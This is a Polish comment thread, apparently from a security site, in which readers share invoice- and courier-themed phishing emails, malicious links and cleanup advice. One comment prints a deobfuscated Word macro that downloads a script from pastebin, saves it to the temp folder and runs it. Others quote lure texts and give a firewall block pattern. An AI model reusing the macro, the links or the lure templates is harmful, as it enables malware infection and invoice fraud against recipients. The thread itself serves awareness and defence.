    End Sub

    • Makro próbuje pobrać wklejkę z pastebin.com o ID KM7EgaRt, ta konkretna została usunięta.

    • reasumujac plik 323 linie z czego ok 10 to rzeczywiste linie reszta to zaciemnienie kodu…

  61. Ciekawe co tam za makrę zainfekowaną schowali…
    Coraz bardziej już ewalują, kiedyś to tylko w zipy, pakowali i myśleli, że jak dopisą pdf czy doc, to otworzą. Teraz już luki w zabezpieczeniach offica, chociaż już dawno mogli to wymyśleć (jestem ciekaw jakie luki wykorzystują).

    • słyszałam o infekowaniu plikami .doc poprzez makra za czasów office 2k

  62. Dzien dobry.

    Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.

    Kris Herman
    Asystent ds. Finansowych

    Od razu widać, że to szwindel.

  63. A ja ostatnio dostaję cos takiego: http://pokazywarka.pl/9lhn1l/ pewnie podobne. Nie pobierałem.

  64. Bawił się ktoś w analizę?

  65. Ja dostałem takie coś:

    From: LeannTrevinoqv@cessa.bepensa.local
    Subject: Faktura A731/27/05/2015

    Dzien dobry.

    Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.

    Leann Trevino

    Asystent ds. Finansowych

    Co ciekawe, https://www.hybrid-analysis.com/ pokazuje: The file format “text” is not supported ale za to metascan-online.com poinformował, że zagrożenie jest znane dla 5 programów AV

    https://www.metascan-online.com/en/scanresult/file/79b3b849a3134312a0ddce24f8b195a1

  66. Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura

    Xx
    Asystent ds finansowych

    Co zrobic jak sie otwarlo zalacznik? Nie ma lekarstwa na glupote, no ale co mozna odkrecic? Jak dziala ten wirus?

  67. Dziś dostałem wariant z RAR-em zabezpieczonym hasłem. Hasło: faktura. :)

    —-

    Drodzy Panstwo, w nazwiazaniu do rozmowy telefonicznej ze srody, tj. 15/05, przesylam fakture VAT do rozliczenia.

    Haslo do faktury to: faktura


    Roman Kosuwski
    Starszy pracownik administracyjny

    Fakir TRANS S.A
    ul. Karlowinska 11/3
    01-024 Warszawa

  68. A ja dostawałem mnóstwo czegoś takiego:
    http://pastebin.com/wRbQREF7

    Na samym końcu zamieściłem wiadomość, którą dostawałem z miesiąc temu, na kilkanaście moim skrzynek (testowych dropboxa). Na początku jest kilka wiadomości, które masowo dostaję od niedawna

  69. Ja ostatnio z różnych adresów dostałam jeszcze wiadomości, które w treści miały tylko ten link:

    http://www.baby-dreams.de/umowa.doc ,

    a w temacie: prosimy o przeczytanie.

    I inne ciekawostki, długo by pisać ;)

  70. Doskonały moment na taką akcję, dużo firm zamyka rok finansowy z końcem miesiąca. Jestem pewien że niejedna faktura została zapłacona, a infekcji nikt nie zliczy.

  71. Czy usunięcie tego pliku .exe i użycie eset online wystarczy aby się tego pozbyć?
    Jeśli ktoś zna odpowiedź to bardzo dziękuję za pomoc.

  72. mojej mamie przyszedl tez taki mail. niestety, otworzyla zalacznik. co powinienem teraz zrobic?

  73. Również proszę o pomoc po otwarciu załącznika.
    Czy formatowanie wystarczy?

  74. po wywołaniu makra na jednym z naszych komputerów (w zeszły czwartek – eset nie wykrył nic) został sciagniety bacdor.bug a po jakims czasie na koncie pojawił sie przelew na 82k z hakiem czyli w przyblizeniu jakies 1000BitCoinow na obcego kontrachenta. brakowało tylko podpisac i wysłac

    do wyczyszczenia uzyłem mbam’a

    • Jaśniej? Po polsku?

  75. Tez dostalenm ten badziew
    Otworzylem tak sobei specjalnie zeby zobaczec co sie stanie… office 2013 zablokowal macro
    Comodo antywir nic nie wykryl po skanowaniu samego pliku
    Skasowalem plik i tyle zamieszania :)

  76. Ja dostałem na e-mail służbowy inny dowcip, od: “DHL Express “, z linkiem do jakiejś bzdury w linku do śledzenia przesyłki: http://ktpatilpharmacy.org/XOqHGBZ63xstz

    “Sehr geehrte/-r Kundin/Kunde,
    es geht um die Sendung mit der Nummer 2141911214. Wir werden den zuletzt mitgeteilten Zustellzeitpunkt leider nicht einhalten. Der neu festgelegte voraussichtliche Zeitpunkt der Zustellung ist Montag, der 01.06..

    Für weitere Informationen zu der Sendung – z.B. aktueller Statusreport zur Sendung – nutzen Sie bitte den folgenden: Status, DHL Sendungsverfolgung.
    Freundliche Grüße,
    DHL Team

    Diese Nachricht dient nur der Bereitstellung der Information und garantiert nicht die Zustellung der Sendung. Bitte Antworten Sie nicht auf diese E-Mail. Ihre E-Mail-Adresse wird ausschließlich für die Ankündigung der oben genannten Sendung genutzt und wird nicht zu Werbezwecken gespeichert.
    ________________________________________
    Deutsche Post AG
    Charles-de-Gaulle-Str. 20
    53113 Bonn

    Registergericht Bonn
    HRB 6792
    USt-IdNr.: DE 169838187 Vertreten durch den Vorstand
    Dr. Frank Appel, Vorsitzender
    Ken Allen
    Roger Crook
    Jürgen Gerdes
    John Gilbert
    Melanie Kreis
    Lawrence A. Rosen Website
    Kontakt
    Impressum

    © 2015 DHL”

  77. Dzien dobry, Bardzo prosze o zaplacenie naszej fakturki nr 01/2015 na kwote 17505,00 zl ( wpisowe zawodników.) Pozdrawiam, Sallie Hess

  78. Pewności nie mam, ale wydaje mi się że taki zestaw czyści komputer z tego dziadostwa:
    1) Ręczne czyszczenie zawartości katalogu “%user%\appdata\local\temp”
    2) Combofix – skanowanie
    3) ESET Online Scanner – skanowanie
    4) Malwarebytes Anti-Malware – skanowanie

  79. Dnia 19 maja otrzymałem coś takiego:

    Good Afternoon,
    We have polled a outpayment from you for the sum of € 2572. Please would you provide me with a remittance, in order for me to approve the affirmative.
    I will be sending you a avouchment of outstanding chits tomorrow, the total amount of outstanding is € 5280 less the 1 pouch received making a total outstanding of € 2708. We would very much appreciate settlement of this.
    As previously mentioned we changed to a limited company on 1st December 2014. We have a desire to close all the old accounts down, for both tax and year end reasons. We would be very grateful in your assistance in settling the outstanding.
    If you need any copy of invoices please do not hesitate to contact us

    Regards,
    Judy Pace

    Załącznik też .doc i nazwa w podobnej składni.

  80. Do mnie też przyszedł mail z rzekomą fakturą za wpisowe zawodników tyle, ze na kwotę ponad 42 000. Maila wrzuciłam najpierw do spam, a później skasowałam. Nie wiem na jakiej zasadzie wybierają adresy mailowe, do których te wirusy rozsyłają.

  81. masowo widac spamuja w jezyku ojczystym .. Bezpieczne Panstwo :)

  82. ceny dzisiaj spały :)

    Dzien dobry,

    Bardzo prosze o zaplacenie naszej fakturki nr 05/2015 na kwote 2090,00 zl ( wpisowe zawodników.)

    Pozdrawiam,

    Aida Silva

    LKJ “Lewada”

  83. Zmienili treść wiadomości na inną. W załączniku jest AA8BA0_8633A93A7.doc

    From: Brenda Pace [mailto:BrendaPacetu@greenwoodvideo.co.uk]
    Sent: Tuesday, June 02, 2015 11:38 AM
    To: –
    Subject: Dokumentacje cen transferowcy

    Wiadomosc jest gotowa do wyslania wraz z nastepujacymi zalacznikami pliku lub lacza:
    Faktury sprzeaz nfm 903502 maj

    Uwaga: W celu ochrony przed wirusami komputerowymi programy poczty e-mail moga zapobiegac wysylaniu i odbieraniu pewnych typów zalaczników plików. Sprawdz ustawienia zabezpieczen poczty e-mail, aby okreslic obsluge zalaczników.

    Pozdrawiam,

    Brenda Pace
    Glówny Specjalista ds. Remarketingu Pojazdów

    • Szanowni Panstwo,

      zgodnie z ustaleniami w zalaczeniu przesylam ostateczne dokumentacje cen transferowych do transakcji z roku 2013 w plikach w formacie word oraz PDF. Prosze o uzupelnienie ich o zalaczniki zgodnie z trescia dokumentacji (kpie umów oraz aneksów)

      Dzisiaj wieczorem pozwole sobie przeslac fakture za swoje uslugi.
      W razie pytan prosze o kontakt

      Z powazaniem

      Lillie Landowski
      Doradca podatkowy

  84. Czy juz wiadomo co jest w tych zalacznikach? Moja mama sie wczoraj pochwalila ze dostala dwa takie maile i bez otwierania zalacznikow odpisala ze to chyba pomylka :P

  85. Dla ciekawych – właściwa treść makra po “odciemnieniu kodu”

    Sub adobe()
    Set object = CreateObject(“MSXML2.XMLHTTP”)
    urlAdress = StrReverse(“tth”) + StrReverse(“i?php.daolnwod/moc.nibetsap//:p”) + StrReverse(“tRagE7MK=”)
    Call object.Open(“POST”, urlAdress, False)
    object.Send
    Set fso = CreateObject(“Scripting.FileSystemObject”)
    filePath = Environ(“TEMP”) & “\fileName.vbs”
    Set file = fso.CreateTextFile(filePath, 2)
    file.Write object.ResponseText
    file.Close
    Set shell = CreateObject(“Shell.Application”)
    shell.Open Environ(“TEMP”) & “\fileName.vbs”
    End Sub

  86. 114 komentarzy (godzina. 15:12) i wszystkie dotyczą *skutków* złośliwego spamu. Może warto taki spam, przed skasowaniem, przekazywać fachowcom?
    Może oni, oprócz ofiar nieświadomie rozsyłających spam, pomogą administratorom sieci znaleźć właściwe źródła infekcji, na ich własnych podwórkach?
    Ja, do takich przypadków, używam spamcop.net, jak jeszcze można ograniczać źródła tego śmiecia?

  87. Komu? Komu? Dostałem emaila z fakturą do zapłacenia, zawierał jeden załącznik – ‘mailing_SPRING.jpg’, po zapisaniu tego załącznika zapisał się również drugi (ukryty?) załącznik – ‘informacja_22351.scr’. Okazało się że pierwszy jest ‘łobrazkiem’ reklamującym bank ‘City Handlowy’, natomiast drugi jest plikiem wykonywalnym pod Windowsa. Jeżeli ktoś sobie życzy to mogę Mu podesłać obydwa załączniki do analizy. Spakowane (tar.gz) ważą 81 KiB.

  88. ja dzis otrzymalam
    ”Dzien dobry, Bardzo prosze o zaplacenie naszej fakturki nr 01/2015 na kwote
    10447,00 zl ( wpisowe zawodników.) Pozdrawiam, Sallie Hess”

    niestety otworzylam ale komputer zablokowal informacja ze jest to niebezpieczne dla mojego komputera od razu usunelam

  89. Ja czasem dostaje poczta list od nieznanej firmy ktora nie istnieje, w tresci jest napisane:
    “Panska babcia z angli ma majatek ktory zachowal sie z czasow drugiej wojny swiatowej”

    Moja reakcja: list do kosza wiadomo ze sciema gdyz nie mam i nie mialem nigdy rodziny w angli, oraz dostaje duuuzo syfu dotyczace mojej strony www na ktorej mam tylko swoje projekty www, dotycza podobnych rzeczy np. ze chetnie pomoga mi z rozwojem mojego “serwisu” to bardzo mile z ich strony :)

    PS: Odezwe sie na e-mail do redakcji jak dostane cos takiego ponownie :)

  90. A ja dostałam takiego meila Dzien dobry, Bardzo prosze o zaplacenie naszej fakturki nr 01/2015 na kwote 54681,00 zl ( wpisowe zawodników.) Pozdrawiam, Sallie Hess. Chciałam otworzyć doc ale na szczęście nic mi się nie otworzyło

  91. Moje maile: Dzień dobry, Bardzo prosze o zapłacenie naszej fakturki nr 01/2015 na kwotę 95975,00zł ( wpisowe zawodników) Pozdrawiam Sallie Hess.
    Dzień dobry. Informujemy, ze na Państwa koncie zostały wystawione nowe faktury.Informujemy, ze załączony dokument jest faktura. Niestety w 10 dni temu kliknąłem w doc i złapałem Win32.Agent – bardzo grożny wirus. Do skanu użyłem Kaspersky(wykrył) AdCleaner, Malware-AntiMalware. i inne znalezione w necie na temat jak usuną Win32.Agent. Teraz otwieram pocztę na serwerze Onetu, tam od razu wyskakuje komunikat o szkodliwym załaczniku.

  92. Ja dzis dostałem od DHL.

    Sledzenie trasy przesylki DHL
    Tutaj znajdziesz informacje o szukanych przesylkach.

    Numer przesylki 3915215226
    Produkt / serwis DHL RETOURE
    Status od poniedziałek, 08.06.2015 06:55:53 Przesylka jest przygotowywana w centrum pakowania.
    Doreczono do Przesylka zwrotna do nadawcy

    Wyświetl informacje od odbiorcy
    (PDF-Dokument)

    Najbardziej rozbawił mnie adresat: tobias.janssen@toyota-schumacher.de

    Prawdopodobnie będe miał nowa toyote w paczce.

    • Ja znowu DHL, znów po niemiecku:
      Od: paket@dhl.com
      Temat: Statusinformationen betreffend Sendung 9876872155
      ” Werte Kundin, Werter Kunde,
      es geht um die Sendung mit der Nummer 9876872155. Wir werden den zuletzt mitgeteilten Zustellzeitpunkt leider nicht einhalten. Der neu festgelegte voraussichtliche Zeitpunkt der Zustellung ist Montag, der 08.06..

      Für weitere Informationen zu der Sendung – z.B. aktueller Statusreport zur Sendung – nutzen Sie bitte den folgenden: DHL Sendung, Nachverfolgung.
      Freundliche Grüße,
      DHL Team
      (…)”
      Link do “śledzenia przesyłki” (syf): http://blog.indirware.com/yaC0eYKQ1ghHm

  93. Witam. Mogłby ktos “prostym” językiem napisać co robic w sytuacji otwarcia załącznika i czy można coś zrobić by takich mail wiecej nie otrzymyać.
    Z gory dziekuję

  94. 06.08.2015

    Sledzenie trasy przesylki DHL

    Sledzenie trasy przesylki DHL
    Tutaj znajdziesz informacje o szukanych przesylkach.
    Numer przesylki 7147387593
    Produkt / serwis DHL PAKET
    Status od poniedziałek, 08.06.2015 08:34:45 Dane dotyczace zlecenia tej przesylki nadawca przeslal droga elektroniczna do DHL.
    Doreczono do Przesylka zwrotna do nadawcy

    Sprawdź informacje od odbiorcy
    (Adobe PDF Format)

    Przyszło z adresu: DHL Support

  95. Ja dzis dostałam dwa z “niby” fakturami

  96. właśnie przyszło cuś takiego:
    Szanowni Panstwo,
    zgodnie z ustaleniami w zalaczeniu przesylam ostateczne dokumentacje cen transferowych do transakcji z roku 2013 w plikach w formacie word oraz PDF. Prosze o uzupelnienie ich o zalaczniki zgodnie z trescia dokumentacji (kpie umów oraz aneksów)
    Dzisiaj wieczorem pozwole sobie przeslac fakture za swoje uslugi.
    W razie pytan prosze o kontakt
    Z powazaniem, Ervin Kopec
    Doradca podatkowy

  97. Szanowni Panstwo,

    zgodnie z ustaleniami w zalaczeniu przesylam ostateczne dokumentacje cen transferowych do transakcji z roku 2013 w plikach w formacie word oraz PDF. Prosze o uzupelnienie ich o zalaczniki zgodnie z trescia dokumentacji (kpie umów oraz aneksów)

    Dzisiaj wieczorem pozwole sobie przeslac fakture za swoje uslugi.
    W razie pytan prosze o kontakt

    Z powazaniem

    Lindsey Toma
    Doradca podatkowy

  98. Właśnie dostałem mail “od” Telekom Deutschland. Moim zdaniem to jest jakiś zróżnicowany, upierdliwy i zdeterminowany atak, a nie zbiór losowych prac, ale nie znam się.

    Obciąłem pierdoły, stopki i ozdobniki.
    Od: Telekom Deutschland
    Temat: Ihre Telekom Festnetz-Rechnung Juni 2015
    Link w tekście: http://www.szigligeti.udulo.szentes.hu/config/n9adXEcjkpQ7t
    “Ihre Rechnung für Juni 2015

    Sehr geehrte Kundin, sehr geehrter Kunde,

    mit dieser Nachricht senden wir Ihnen Ihre aktuelle Rechnung zu. Der Rechnungsbetrag für den Juni 2015 beläuft sich auf 321,23 Euro.

    https://www.t-online.de/t/kundencenter?wt_mc=aktuelle_abrechnungen_festnetz_rechnung.

    Diese Benachrichtigung wurde automatisch generiert. Bitte nicht antworten.

    Mit freundlichen Grüßen

    Ralf Hoßbach
    Leiter Kundenservice”

    W zasadzie to mail przyszedł teraz kolejno na dwa różne maile grupowe w domenie firmowej. Różne są “kwoty”, różny jest nadawca (drugi: Telekom Deutschland GmbH {NoReply} ), ale link jest identyczny.

  99. nowa wersja od wczoraj, widzę, że już ktoś podobne miał:

    Leila Kuczmarski Załącznik10 czerwca 2015 12:55
    Uważaj na tę wiadomość. Może ona zawierać wirusa lub szkodliwy link. Więcej informacji
    Szanowni Panstwo,
    zgodnie z ustaleniami w zalaczeniu przesylam ostateczne dokumentacje cen transferowych do transakcji z roku 2013 w plikach w formacie word oraz PDF. Prosze o uzupelnienie ich o zalaczniki zgodnie z trescia dokumentacji (kpie umów oraz aneksów)
    Dzisiaj wieczorem pozwole sobie przeslac fakture za swoje uslugi.
    W razie pytan prosze o kontakt
    Z powazaniem
    i załącznik 4482B8/C4E2398C15.doc

  100. Ok, zamiast nowych treści przydałoby się dowiedzieć, co dokładnie robi odpalenie tego badziewia i jak to wywalić. W firmie w której pracuję oczywiście geniusze pootwierali załączniki mimo powiadomienia ich o tych wiadomościach. Tylko mi roboty przysporzyli.

    • Wydaje mi się, że dobry antywirus wystarczy. U mnie F-Secure zablokował możliwość otwarcia załącznika. Poza tym do analizy co to jest (albo co to wykrywa) przydatne jest wrzucenie pliku na virustotal.com.

  101. Mi od dłuższego czasu przychodzą na pocztę komunikaty dot. zapłacenia za jakąś przesyłkę, mają jednak inne tytuły niż te podane – czasem przychodzą kilka razy dziennie. Oczywiście żadnej przesyłki nie było.

  102. Na szczęście jestem dość doświadczonym użytkownikiem Jnternetu i nie ściągałam nic z takiej wiadomości, bo to od razu źle wyglądała. Tym bardziej, że przychodzi z 5 podobnych wiadomości na raz… w tej chwili jest to na tyle złe, że upierdliwe – ileż można tego usuwać?

  103. A jak się przed tym bronić w firmach?

    • Wszystkie te pliki uruchamiały skrypt, który pobierał plik z określonego adresu. Zawsze był to adres, w którym końcówka wyglądała tak: bt/get.php (jeden się zdarzył bodajże bt/p1get.php). Jeśli masz sprzętowego firewalla, albo w sumie firewalla w windowsie, zablokuj ruch na jakikolwiek adres, w którym będzie podobna końcówka. U mnie adres w regułce blokującej wygląda to tak: */bt*get.php. W ten sposób nawet jak ktoś odpali plik to nic się nie pobierze, przez co nie zainfekuje się komputera.

  104. 18.06.2015 dyrektor Finansowy banku iPKO Laura Majko wystapila z wnioskiem,ze od poczatku marca biezacego roku, wszystkie przelewy sa wykonywane pod scislym nadzorem urzedu podatkowego
    i glównego banku Unii europejskiej w Brukseli.
    Zostanie wprowadzony system limitów i automatycznej kontroli, w niektórych przypadkach pelny audyt.

    Szczególy tego reportazu mozesz przeczytac zalaczony plik.

  105. Podobnie z mailami pochodzącymi rzekomo od DHL-a, które pod pretekstem mozliwości sprawdzenia statusu przesyłki nakłaniają do pobrania i uruchomienia pliku wykonywalnego :-)

  106. Nowe maile i pewnie nowsze zagrożenie:
    Prosimy o zaplacenie za uslugi.

    Haslo do faktury to: rozliczenia


    Barbara Kownacka
    Mlodszy pracownik administracyjny

    US Paradys Polska Sp. z.o.o.
    ul. Pradzynskiego 1/3
    01-222 Warszawa

    Nadawca: beata.korpus@kancelus.pl
    Temat: faktura vat-zalegla
    IP:panigadget.nazwa.pl (unknown [85.128.142.55])
    Nazwa załącznika: f-vat_06_06_2015.pdf.rar

  107. a ja dostałem dziś:

    Witam Panstwa.

    Nadal nie otrzymalismy platnosci za fakture FV 11/06/2015. Mogla do Panstwa nie dotrzec dlatego teraz wrzucilem ja na hosting dokumentow tutaj http://downloaded.pl/pobierz/fv-11062015 Prosze pobrac i uregulowac naleznosc. W przeciwnym wypadku sprawe skierujemy do windykacji.

    Dokument zabezpieczony jest haslem przypisanym do Panstwa numeru telefonu. Aby uniknac problemow prosze o pilne zalatwienie sprawy.

    Pozdrawiam
    Tomasz z Lubicz Inkasso”

    Kto się łapie na takie debilne powiadomienia…?

  108. Szanowni Państwo,

    Na dzień dzisiejszy nie odnotowaliśmy wpłaty za faktury. W załączeniu przesyłam listę!
    Jeżeli należności zostały uregulowane proszę uznać powyższą wiadomość za nieważną. W przypadku nieuregulowania płatności w terminie 8 dni od dnia otrzymania tej wiadomości, sprawa może zostać skierowana do windykacji.

    Serdecznie pozdrawiamy
    Katarzyna Szymska, SOPEL Sp. z o.o.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: